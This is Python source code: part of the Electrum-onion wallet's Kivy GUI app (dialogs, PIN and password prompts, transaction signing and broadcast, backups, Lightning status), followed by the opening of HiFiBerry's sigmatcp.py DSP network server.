            Clock.schedule_once(lambda dt: self._channels_dialog.update())
    def on_channels(self, evt, wallet):
        # 'channels_updated' event: refresh the channel list dialog on the UI thread.
        if self._channels_dialog:
            Clock.schedule_once(lambda dt: self._channels_dialog.update())
    def is_wallet_creation_disabled(self):
        # In single-password mode, creation is blocked until the password is known.
        return bool(self.electrum_config.get('single_password')) and self.password is None
    def wallets_dialog(self):
        # Open the wallet chooser rooted at the wallets directory.
        from .uix.dialogs.wallets import WalletDialog
        dirname = os.path.dirname(self.electrum_config.get_wallet_path())
        d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
        d.open()
    def popup_dialog(self, name):
        """Open the popup identified by `name`.

        Dispatch order: known dialog methods > the 'status' kv popup (which
        needs master-public-key widgets injected) > any `*_dialog` method by
        name > a plain kv file of that name.
        """
        if name == 'settings':
            self.settings_dialog()
        elif name == 'wallets':
            self.wallets_dialog()
        elif name == 'status':
            popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
            master_public_keys_layout = popup.ids.master_public_keys
            # the first master public key is already in the kv layout; add the rest
            for xpub in self.wallet.get_master_public_keys()[1:]:
                master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
                ref = RefLabel()
                ref.name = _('Master Public Key')
                ref.data = xpub
                master_public_keys_layout.add_widget(ref)
            popup.open()
        elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
            self.show_error(_("Not available for this wallet.") + "\n\n" +
                            _("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
        elif name.endswith("_dialog"):
            getattr(self, name)()
        else:
            popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
            popup.open()
    @profiler
    def init_ui(self):
        ''' Initialize The Ux part of electrum. This function performs the basic
        tasks of setting up the ui: registers lazily-imported widget factories,
        wires up the screen manager and tab panel, and sets the app icon.
        '''
        #from weakref import ref
        self.funds_error = False
        # setup UX
        self.screens = {}
        #setup lazy imports for mainscreen
        Factory.register('AnimatedPopup',
                         module='electrum_onion.gui.kivy.uix.dialogs')
        Factory.register('QRCodeWidget',
                         module='electrum_onion.gui.kivy.uix.qrcodewidget')
        # preload widgets. Remove this if you want to load the widgets on demand
        #Cache.append('electrum_onion_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
        #Cache.append('electrum_onion_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
        # load and focus the ui
        self.root.manager = self.root.ids['manager']
        # screens are created lazily; see update_tab()/switch_to()
        self.history_screen = None
        self.send_screen = None
        self.receive_screen = None
        self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum-onion.png"
        self.tabs = self.root.ids['tabs']
    def update_interfaces(self, dt):
        # Refresh network-status properties (server, chain, proxy) from Network.
        net_params = self.network.get_parameters()
        self.num_nodes = len(self.network.get_interfaces())
        self.num_chains = len(self.network.get_blockchains())
        chain = self.network.blockchain()
        self.blockchain_forkpoint = chain.get_max_forkpoint()
        self.blockchain_name = chain.get_name()
        interface = self.network.interface
        if interface:
            self.server_host = interface.host
        else:
            # not connected yet; show the configured server with a hint
            self.server_host = str(net_params.server.host) + ' (connecting...)'
        self.proxy_config = net_params.proxy or {}
        self.update_proxy_str(self.proxy_config)
    def on_network_event(self, event, *args):
        # Fan incoming network events out to the appropriate throttled triggers.
        self.logger.info('network event: '+ event)
        if event == 'network_updated':
            self._trigger_update_interfaces()
            self._trigger_update_status()
        elif event == 'wallet_updated':
            self._trigger_update_wallet()
            self._trigger_update_status()
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self._trigger_update_wallet()
        elif event == 'status':
            self._trigger_update_status()
        elif event == 'new_transaction':
            self._trigger_update_wallet()
        elif event == 'verified':
            self._trigger_update_wallet()
    @profiler
    def load_wallet(self, wallet: 'Abstract_Wallet'):
        """Make `wallet` the active wallet: close the previous one, refresh all
        screens, run plugin hooks and check for address corruption."""
        if self.wallet:
            self.stop_wallet()
        self.wallet = wallet
        self.wallet_name = wallet.basename()
        self.update_wallet()
        # Once GUI has been initialized check if we want to announce something
        # since the callback has been called before the GUI was initialized
        if self.receive_screen:
            self.receive_screen.clear()
        self.update_tabs()
        run_hook('load_wallet', wallet, self)
        try:
            wallet.try_detecting_internal_addresses_corruption()
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            send_exception_to_crash_reporter(e)
            return
        self.use_change = self.wallet.use_change
        self.electrum_config.save_last_wallet(wallet)
        self.request_focus_for_main_view()
    def request_focus_for_main_view(self):
        if platform != 'android':
            return
        # The main view of the activity might be not have focus
        # in which case e.g. the OS "back" button would not work.
        # see #6276 (specifically "method 2" and "method 3")
        from jnius import autoclass
        PythonActivity = autoclass('org.kivy.android.PythonActivity')
        PythonActivity.requestFocusForMainView()
    def update_status(self, *dt):
        """Refresh the balance / connection status shown in the header.

        While offline, syncing or lagging, a status string replaces both
        balance labels; otherwise the on-chain + lightning balance is shown.
        """
        if not self.wallet:
            return
        if self.network is None or not self.network.is_connected():
            status = _("Offline")
        elif self.network.is_connected():
            self.num_blocks = self.network.get_local_height()
            server_height = self.network.get_server_height()
            server_lag = self.num_blocks - server_height
            if not self.wallet.up_to_date or server_height == 0:
                num_sent, num_answered = self.wallet.get_history_sync_state_details()
                status = ("{} [size=18dp]({}/{})[/size]"
                          .format(_("Synchronizing..."), num_answered, num_sent))
            elif server_lag > 1:
                status = _("Server is lagging ({} blocks)").format(server_lag)
            else:
                status = ''
        else:
            status = _("Disconnected")
        if status:
            self.balance = status
            self.fiat_balance = status
        else:
            # confirmed + unconfirmed + unmatured, plus lightning if available
            c, u, x = self.wallet.get_balance()
            l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
            balance_sat = c + u + x + l
            text = self.format_amount(balance_sat)
            self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
            self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
    def update_wallet_synchronizing_progress(self, *dt):
        # Periodic tick while syncing: keep the "Synchronizing..." counter fresh.
        if not self.wallet:
            return
        if not self.wallet.up_to_date:
            self._trigger_update_status()
    def get_max_amount(self):
        """Compute the maximum spendable amount as a base-unit string.

        Builds a max ('!') send transaction from all spendable coins to the
        current (or dummy) address, subtracts any plugin extra fee, and
        returns '' when nothing can be spent or fees cannot be estimated.
        """
        from electrum_onion.transaction import PartialTxOutput
        if run_hook('abort_send', self):
            return ''
        inputs = self.wallet.get_spendable_coins(None)
        if not inputs:
            return ''
        addr = None
        if self.send_screen:
            addr = str(self.send_screen.address)
        if not addr:
            # no destination entered yet; a placeholder address is fine for fee estimation
            addr = self.wallet.dummy_address()
        outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
        try:
            tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
        except NoDynamicFeeEstimates as e:
            # may be raised from a non-UI context; report on the UI thread
            Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
            return ''
        except NotEnoughFunds:
            return ''
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            send_exception_to_crash_reporter(e)
            return ''
        amount = tx.output_value()
        # plugins (e.g. trustedcoin) may charge an extra fee on top
        __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
        amount_after_all_fees = amount - x_fee_amount
        return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
    def format_amount(self, x, is_diff=False, whitespaces=False):
        # Format a satoshi amount using the configured decimal point (no unit suffix).
        return format_satoshis(
            x,
            num_zeros=0,
            decimal_point=self.decimal_point(),
            is_diff=is_diff,
            whitespaces=whitespaces,
        )
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
    def format_fee_rate(self, fee_rate):
        # fee_rate is in sat/kB; displayed as oni/byte
        return format_fee_satoshis(fee_rate/1000) + ' oni/byte'
    #@profiler
    def update_wallet(self, *dt):
        # Refresh status; refresh tabs only once the wallet is settled (or offline).
        self._trigger_update_status()
        if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
            self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('electrum-onion', message,
app_icon=icon, app_name='electrum-onion')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
    def on_pause(self):
        # Record when we were backgrounded (used by on_resume to re-lock),
        # and stop NFC scanning while paused.
        self.pause_time = time.time()
        # pause nfc
        if self.nfcscanner:
            self.nfcscanner.nfc_disable()
        return True
    def on_resume(self):
        # Re-enable NFC and, after >5 min in the background, require the PIN again.
        if self.nfcscanner:
            self.nfcscanner.nfc_enable()
        if self.resume_dialog is not None:
            return  # a lock dialog is already showing
        now = time.time()
        if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
            def on_success(x):
                self.resume_dialog = None
            d = PincodeDialog(
                self,
                check_password=self.check_pin_code,
                on_success=on_success,
                on_failure=self.stop)
            self.resume_dialog = d
            d.open()
    def on_size(self, instance, value):
        # Window resize: derive orientation and phone/tablet mode from the new size.
        width, height = value
        self._orientation = 'landscape' if width > height else 'portrait'
        self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
    def on_ref_label(self, label, *, show_text_with_qr: bool = True):
        # Tap handler for RefLabel widgets: show the label's data as a QR popup.
        if not label.data:
            return
        self.qr_dialog(label.name, label.data, show_text_with_qr)
    def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
        exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/error', duration=0,
        modal=False):
        ''' Show an error Message Bubble.
        '''
        self.show_info_bubble(text=error, icon=icon, width=width,
            pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
            duration=duration, modal=modal)
    def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
        exit=False, duration=0, modal=False):
        ''' Show an Info Message Bubble (show_error with the info icon).
        '''
        self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/important',
            duration=duration, modal=modal, exit=exit, pos=pos,
            arrow_pos=arrow_pos)
    def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
        arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
        '''Method to show an Information Bubble
        .. parameters::
            text: Message to be displayed; the special value 'texture' makes
                `icon` (a texture) display full-screen instead of text
            pos: position for the bubble
            duration: duration the bubble remains on screen. 0 = click to hide
            width: width of the Bubble
            arrow_pos: arrow position for the bubble; falsy hides the arrow
            icon: icon source (or a texture, see above)
            modal: whether the bubble blocks the rest of the UI
            exit: forwarded to InfoBubble.show()
        '''
        text = str(text)  # so that we also handle e.g. Exception
        info_bubble = self.info_bubble
        if not info_bubble:
            # single bubble instance is reused across calls
            info_bubble = self.info_bubble = Factory.InfoBubble()
        win = Window
        if info_bubble.parent:
            # already visible: detach first (modal bubbles live inside a wrapper view)
            win.remove_widget(info_bubble
                                if not info_bubble.modal else
                                info_bubble._modal_view)
        if not arrow_pos:
            info_bubble.show_arrow = False
        else:
            info_bubble.show_arrow = True
            info_bubble.arrow_pos = arrow_pos
        img = info_bubble.ids.img
        if text == 'texture':
            # icon holds a texture not a source image
            # display the texture in full screen
            text = ''
            img.texture = icon
            info_bubble.fs = True
            info_bubble.show_arrow = False
            img.allow_stretch = True
            info_bubble.dim_background = True
            info_bubble.background_image = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/card'
        else:
            info_bubble.fs = False
            info_bubble.icon = icon
            #if img.texture and img._coreimage:
            #    img.reload()
            img.allow_stretch = False
            info_bubble.dim_background = False
            info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
        info_bubble.message = text
        if not pos:
            pos = (win.center[0], win.center[1] - (info_bubble.height/2))
        info_bubble.show(pos, duration, width, modal=modal, exit=exit)
    def tx_dialog(self, tx):
        # Open the on-chain transaction detail dialog.
        from .uix.dialogs.tx_dialog import TxDialog
        d = TxDialog(self, tx)
        d.open()
    def show_transaction(self, txid):
        # Look up a tx by id in the wallet DB (falling back to the lightning
        # watcher's DB) and show it, or report that it was not found.
        tx = self.wallet.db.get_transaction(txid)
        if not tx and self.wallet.lnworker:
            tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
        if tx:
            self.tx_dialog(tx)
        else:
            self.show_error(f'Transaction not found {txid}')
    def lightning_tx_dialog(self, tx):
        # Open the lightning payment detail dialog.
        from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
        d = LightningTxDialog(self, tx)
        d.open()
    def sign_tx(self, *args):
        # Sign in a background thread to keep the UI responsive.
        threading.Thread(target=self._sign_tx, args=args).start()
    def _sign_tx(self, tx, password, on_success, on_failure):
        # Worker for sign_tx(); runs off the UI thread, so callbacks are
        # marshalled back via Clock.
        try:
            self.wallet.sign_transaction(tx, password)
        except InvalidPassword:
            Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
            return
        # plugins (e.g. trustedcoin) may wrap the success callback
        on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
        Clock.schedule_once(lambda dt: on_success(tx))
    def _broadcast_thread(self, tx, on_complete):
        # Worker for broadcast(); reports (ok, msg) back on the UI thread.
        status = False
        try:
            self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
        except TxBroadcastError as e:
            msg = e.get_message_for_gui()
        except BestEffortRequestFailed as e:
            msg = repr(e)
        else:
            status, msg = True, tx.txid()
        Clock.schedule_once(lambda dt: on_complete(status, msg))
    def broadcast(self, tx):
        """Broadcast `tx` in a background thread and report the outcome."""
        def on_complete(ok, msg):
            if ok:
                self.show_info(_('Payment sent.'))
                if self.send_screen:
                    self.send_screen.do_clear()
            else:
                msg = msg or ''
                self.show_error(msg)
        if self.network and self.network.is_connected():
            self.show_info(_('Sending'))
            threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
        else:
            self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
    def description_dialog(self, screen):
        # Let the user edit the description/label shown on `screen`.
        from .uix.dialogs.label_dialog import LabelDialog
        text = screen.message
        def callback(text):
            screen.message = text
        d = LabelDialog(_('Enter description'), text, callback)
        d.open()
    def amount_dialog(self, screen, show_max):
        """Open the amount keypad for `screen`; '!' selects the max amount."""
        from .uix.dialogs.amount_dialog import AmountDialog
        amount = screen.amount
        if amount:
            # screen.amount is '<number> <unit>'; the dialog wants just the number
            amount, u = str(amount).split()
            assert u == self.base_unit
        def cb(amount):
            if amount == '!':
                screen.is_max = True
                max_amt = self.get_max_amount()
                screen.amount = (max_amt + ' ' + self.base_unit) if max_amt else ''
            else:
                screen.amount = amount
                screen.is_max = False
        popup = AmountDialog(show_max, amount, cb)
        popup.open()
    def addresses_dialog(self):
        # Open (and lazily create/cache) the address list dialog.
        from .uix.dialogs.addresses import AddressesDialog
        if self._addresses_dialog is None:
            self._addresses_dialog = AddressesDialog(self)
        self._addresses_dialog.update()
        self._addresses_dialog.open()
    def fee_dialog(self):
        # Open the fee settings dialog; refresh the fee status when it changes.
        from .uix.dialogs.fee_dialog import FeeDialog
        fee_dialog = FeeDialog(self, self.electrum_config, self.set_fee_status)
        fee_dialog.open()
    def set_fee_status(self):
        # Refresh the fee status text from config (e.g. 'static'/'eta' target).
        target, tooltip, dyn = self.electrum_config.get_fee_target()
        self.fee_status = target
    def on_fee(self, event, *arg):
        # 'fee' network event: fee estimates changed.
        self.set_fee_status()
    def protected(self, msg, f, args):
        """Run `f(*args, password)` after user confirmation.

        With a PIN configured, the PIN dialog gates the call; otherwise a
        plain OK/Cancel question is shown. Note: the entered PIN itself is
        discarded — `f` always receives the stored wallet password.
        """
        if self.electrum_config.get('pin_code'):
            msg += "\n" + _("Enter your PIN code to proceed")
            on_success = lambda pw: f(*args, self.password)
            d = PincodeDialog(
                self,
                message = msg,
                check_password=self.check_pin_code,
                on_success=on_success,
                on_failure=lambda: None)
            d.open()
        else:
            d = Question(
                msg,
                lambda b: f(*args, self.password) if b else None,
                yes_str=_("OK"),
                no_str=_("Cancel"),
                title=_("Confirm action"))
            d.open()
    def delete_wallet(self):
        # Step 1: simple yes/no confirmation.
        basename = os.path.basename(self.wallet.storage.path)
        d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
        d.open()
    def _delete_wallet(self, b):
        # Step 2: PIN/password-protected confirmation.
        if b:
            basename = self.wallet.basename()
            self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
                           self.__delete_wallet, ())
    def __delete_wallet(self, pw):
        # Step 3: verify the password, remove the file, open the last-used wallet.
        wallet_path = self.get_wallet_path()
        basename = os.path.basename(wallet_path)
        if self.wallet.has_password():
            try:
                self.wallet.check_password(pw)
            except InvalidPassword:
                self.show_error("Invalid password")
                return
        self.stop_wallet()
        os.unlink(wallet_path)
        self.show_error(_("Wallet removed: {}").format(basename))
        new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
        self.load_wallet_by_name(new_path)
    def show_seed(self, label):
        # PIN/password-gated seed display; fills `label` on success.
        self.protected(_("Display your seed?"), self._show_seed, (label,))
    def _show_seed(self, label, password):
        # Callback for show_seed(); `password` comes from protected().
        if self.wallet.has_password() and password is None:
            return
        keystore = self.wallet.keystore
        seed = keystore.get_seed(password)
        passphrase = keystore.get_passphrase(password)
        label.data = seed
        if passphrase:
            label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
    def has_pin_code(self):
        # True when a PIN code is configured.
        return bool(self.electrum_config.get('pin_code'))
    def check_pin_code(self, pin):
        # Raise InvalidPassword unless `pin` matches the configured PIN.
        if pin != self.electrum_config.get('pin_code'):
            raise InvalidPassword
    def change_password(self, cb):
        """Open the change-password dialog; in single-password mode the new
        password is applied to every wallet in the directory."""
        def on_success(old_password, new_password):
            # called if old_password works on self.wallet
            self.password = new_password
            if self._use_single_password:
                path = self.wallet.storage.path
                self.stop_wallet()  # must close before re-encrypting the files
                update_password_for_directory(self.electrum_config, old_password, new_password)
                self.load_wallet_by_name(path)
                msg = _("Password updated successfully")
            else:
                self.wallet.update_password(old_password, new_password)
                msg = _("Password updated for {}").format(os.path.basename(self.wallet.storage.path))
            self.show_info(msg)
        on_failure = lambda: self.show_error(_("Password not updated"))
        d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
        d.open()
    def pin_code_dialog(self, cb):
        # In single-password mode offer change vs reset; otherwise change directly.
        if self._use_single_password and self.has_pin_code():
            def on_choice(choice):
                if choice == 0:
                    self.change_pin_code(cb)
                else:
                    self.reset_pin_code(cb)
            choices = {0:'Change PIN code', 1:'Reset PIN'}
            dialog = ChoiceDialog(
                _('PIN Code'), choices, 0,
                on_choice,
                keep_choice_order=True)
            dialog.open()
        else:
            self.change_pin_code(cb)
    def reset_pin_code(self, cb):
        # Disable the PIN after verifying the wallet password.
        on_success = lambda x: self._set_new_pin_code(None, cb)
        d = PasswordDialog(self,
            basename = self.wallet.basename(),
            check_password = self.wallet.check_password,
            on_success=on_success,
            on_failure=lambda: None,
            is_change=False,
            has_password=self.wallet.has_password())
        d.open()
    def _set_new_pin_code(self, new_pin, cb):
        # Persist the PIN (None disables it), then notify via cb and a bubble.
        self.electrum_config.set_key('pin_code', new_pin)
        cb()
        self.show_info(_("PIN updated") if new_pin else _('PIN disabled'))
    def change_pin_code(self, cb):
        # Change the PIN after verifying the current one.
        on_failure = lambda: self.show_error(_("PIN not updated"))
        on_success = lambda old_pin, new_pin: self._set_new_pin_code(new_pin, cb)
        d = PincodeDialog(
            self,
            check_password=self.check_pin_code,
            on_success=on_success,
            on_failure=on_failure,
            is_change=True,
            has_password = self.has_pin_code())
        d.open()
    def save_backup(self):
        """Save a wallet backup to the configured directory; on Android, ask
        for storage permission first."""
        if platform != 'android':
            backup_dir = self.electrum_config.get_backup_dir()
            if backup_dir:
                self._save_backup(backup_dir)
            else:
                self.show_error(_("Backup NOT saved. Backup directory not configured."))
            return
        from android.permissions import request_permissions, Permission
        def cb(permissions, grant_results: Sequence[bool]):
            if not grant_results or not grant_results[0]:
                self.show_error(_("Cannot save backup without STORAGE permission"))
                return
            # note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
            # (needed for WalletDB.write)
            backup_dir = util.android_backup_dir()
            Clock.schedule_once(lambda dt: self._save_backup(backup_dir))
        request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
    def _save_backup(self, backup_dir):
        # Actually write the backup file; report success or failure to the user.
        try:
            new_path = self.wallet.save_backup(backup_dir)
        except Exception as e:
            self.logger.exception("Failed to save wallet backup")
            self.show_error("Failed to save wallet backup" + '\n' + str(e))
            return
        self.show_info(_("Backup saved:") + f"\n{new_path}")
    def export_private_keys(self, pk_label, addr):
        """Reveal the private key for `addr` in `pk_label`, gated behind the
        PIN/password confirmation dialog."""
        if self.wallet.is_watching_only():
            self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
            return
        def show_private_key(addr, pk_label, password):
            if self.wallet.has_password() and password is None:
                return
            if not self.wallet.can_export():
                return
            try:
                key = str(self.wallet.export_private_key(addr, password))
                pk_label.data = key
            except InvalidPassword:
                self.show_error("Invalid PIN")
                return
        self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
    def import_channel_backup(self, encrypted):
        # Confirm before importing a scanned channel backup blob.
        d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
        d.open()
    def _import_channel_backup(self, b, encrypted):
        # Question callback: import the backup and show the channel list.
        if not b:
            return
        try:
            self.wallet.lnworker.import_channel_backup(encrypted)
        except Exception as e:
            self.logger.exception("failed to import backup")
            self.show_error("failed to import backup" + '\n' + str(e))
            return
        self.lightning_channels_dialog()
def lightning_status(self):
    """Return a human-readable description of this wallet's lightning support."""
    if self.wallet.has_lightning():
        if self.wallet.lnworker.has_deterministic_node_id():
            return _('Enabled')
        return _('Enabled, non-recoverable channels')
    if self.wallet.can_have_lightning():
        return _('Not enabled')
    return _("Not available for this wallet.")
def on_lightning_status(self, root):
    """Handle a tap on the lightning status row of dialog *root*.

    Either explains why channels are not seed-recoverable, or offers to
    create lightning keys when lightning is not yet enabled.
    """
    if self.wallet.has_lightning():
        if not self.wallet.lnworker.has_deterministic_node_id():
            # channels exist but cannot be recovered from seed: explain why
            if self.wallet.db.get('seed_type') == 'segwit':
                msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
                        "This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
                        "If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
            else:
                msg = _("Your channels cannot be recovered from seed. "
                        "This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
                        "If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
            self.show_info(msg)
    elif self.wallet.can_have_lightning():
        root.dismiss()
        if self.wallet.can_have_deterministic_lightning():
            msg = _(
                "Lightning is not enabled because this wallet was created with an old version of Electrum. "
                "Create lightning keys?")
        else:
            msg = _(
                "Warning: this wallet type does not support channel recovery from seed. "
                "You will need to backup your wallet everytime you create a new wallet. "
                "Create lightning keys?")
        question = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
        question.open()
def _enable_lightning(self, b):
    """Initialize lightning keys once the user has confirmed (*b* truthy)."""
    if not b:
        return
    self.wallet.init_lightning(password=self.password)
    self.show_info(_('Lightning keys have been initialized.'))
|
sigmatcp.py | '''
Copyright (c) 2018 Modul 9/HiFiBerry
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import socket
import time
import os
import sys
import logging
import hashlib
from threading import Thread
from socketserver import BaseRequestHandler, TCPServer, ThreadingMixIn
# from zeroconf import ServiceInfo, Zeroconf
import xmltodict
import configparser
import requests
from hifiberrydsp.hardware import adau145x
from hifiberrydsp.hardware.spi import SpiHandler
from hifiberrydsp.datatools import int_data
from hifiberrydsp.parser.xmlprofile import \
XmlProfile, ATTRIBUTE_VOL_CTL, ATTRIBUTE_SPDIF_ACTIVE, ATTRIBUTE_MUTE_REG
from hifiberrydsp.alsa.alsasync import AlsaSync
from hifiberrydsp.lg.soundsync import SoundSync
from hifiberrydsp import datatools
from hifiberrydsp.server.constants import \
COMMAND_READ, COMMAND_READRESPONSE, COMMAND_WRITE, \
COMMAND_EEPROM_FILE, COMMAND_CHECKSUM, COMMAND_CHECKSUM_RESPONSE, \
COMMAND_WRITE_EEPROM_CONTENT, COMMAND_XML, COMMAND_XML_RESPONSE, \
COMMAND_STORE_DATA, COMMAND_RESTORE_DATA, COMMAND_GET_META, \
COMMAND_META_RESPONSE, COMMAND_PROGMEM, COMMAND_PROGMEM_RESPONSE, \
COMMAND_DATAMEM, COMMAND_DATAMEM_RESPONSE, \
COMMAND_GPIO, \
HEADER_SIZE, \
DEFAULT_PORT
# import hifiberrydsp
# URL to notify on DSP program updates
# Module-level mutable state, stored as attributes of the module object so
# that request handlers and the server main class share the same values.
this = sys.modules[__name__]
this.notify_on_updates = None    # URL to POST to after a DSP program update
this.command_after_startup = None  # shell command run once the server is up
this.dsp=None                    # detected DSP model name ("" when none found)
def parameterfile():
    """Return the path of the file used to persist DSP parameter data.

    System-wide location when running as root, per-user dotfile otherwise.
    """
    if os.geteuid() == 0:
        return "/var/lib/hifiberry/dspparameters.dat"
    return os.path.expanduser("~/.hifiberry/dspparameters.dat")
def dspprogramfile():
    """Return the path of the stored DSP program XML, creating its directory.

    Uses /var/lib/hifiberry when running as root, ~/.hifiberry otherwise.
    Directory creation failures are logged but not fatal.
    """
    if os.geteuid() == 0:
        logging.info(
            "running as root, data will be stored in /var/lib/hifiberry")
        mydir = "/var/lib/hifiberry"
    else:
        # expand "~" up front: os.path.isdir("~/.hifiberry") never matches,
        # so the original code tried to makedirs a literal "~" directory
        mydir = os.path.expanduser("~/.hifiberry")
        logging.info(
            "not running as root, data will be stored in ~/.hifiberry")

    try:
        if not os.path.isdir(mydir):
            os.makedirs(mydir)
    except Exception as e:
        # %-style placeholders: logging does not interpolate "{}" arguments
        logging.error("can't create directory %s (%s)", mydir, e)

    return os.path.join(mydir, "dspprogram.xml")
def startup_notify():
    """Run the configured post-startup shell command, if any."""
    command = this.command_after_startup
    if command is None:
        return
    # give the TCP server a moment to start listening first
    time.sleep(2)
    logging.info("calling %s", command)
    os.system(command)
class SigmaTCPHandler(BaseRequestHandler):
    """TCP request handler implementing the SigmaStudio/sigmatcp protocol.

    State is kept in class attributes because socketserver creates a new
    handler instance per connection.
    """

    checksum = None            # cached MD5 digest of the DSP program memory
    spi = SpiHandler()         # shared SPI bus accessor
    dsp = adau145x.Adau145x    # DSP register/memory layout description
    dspprogramfile = dspprogramfile()  # path of the current DSP profile XML
    parameterfile = parameterfile()    # path of the stored parameter dump
    alsasync = None            # optional AlsaSync instance (volume mirroring)
    lgsoundsync = None         # optional LG SoundSync instance
    updating = False           # True while a DSP program update is in flight
    xml = None                 # cached XmlProfile of the current DSP program
    checksum_error = False     # True when profile and memory checksums differ

    def __init__(self, request, client_address, server):
        logging.debug("__init__")
        BaseRequestHandler.__init__(self, request, client_address, server)

    def setup(self):
        logging.debug('setup')

    def finish(self):
        logging.debug('finish')
def handle(self):
    """Serve one client connection: read requests, dispatch on command byte.

    The loop keeps reading from the socket, re-assembling requests that
    arrive fragmented (read_more) and carrying over buffers that contain
    more than one request (buffer), until the peer disconnects.
    """
    logging.debug('handle')
    finished = False
    data = None
    read_more = False

    while not finished:
        # Read data
        try:
            buffer = None
            result = None

            if data is None:
                data = self.request.recv(65536)
                if len(data) == 0:
                    finished = True
                    continue

            if read_more:
                logging.debug("waiting for more data")
                d2 = self.request.recv(65536)
                if (len(d2) == 0):
                    time.sleep(0.1)
                data = data + d2
                read_more = False

            # Not an expected header?
            if len(data) > 0 and len(data) < 14:
                read_more = True
                continue

            logging.debug("received request type %s", data[0])

            if data[0] == COMMAND_READ:
                command_length = int.from_bytes(
                    data[1:5], byteorder='big')
                if (command_length > 0) and (len(data) < command_length):
                    read_more = True
                    logging.debug(
                        "Expect %s bytes from header information (read), but have only %s",
                        command_length, len(data))
                    continue
                result = self.handle_read(data)

            elif data[0] == COMMAND_WRITE:
                command_length = int.from_bytes(
                    data[3:7], byteorder='big')
                logging.debug("Len (data, header info): %s %s",
                              len(data), command_length)
                if command_length < len(data):
                    # more than one request in the buffer: process the first,
                    # keep the remainder for the next loop iteration
                    buffer = data[command_length:]
                    data = data[0:command_length]
                if (command_length > 0) and (len(data) < command_length):
                    read_more = True
                    logging.debug(
                        "Expect %s bytes from header information (write), but have only %s",
                        command_length, len(data))
                    continue
                self.handle_write(data)
                result = None

            elif data[0] == COMMAND_EEPROM_FILE:
                filename_length = data[1]
                filename = "".join(map(chr, data[14:14 + filename_length]))
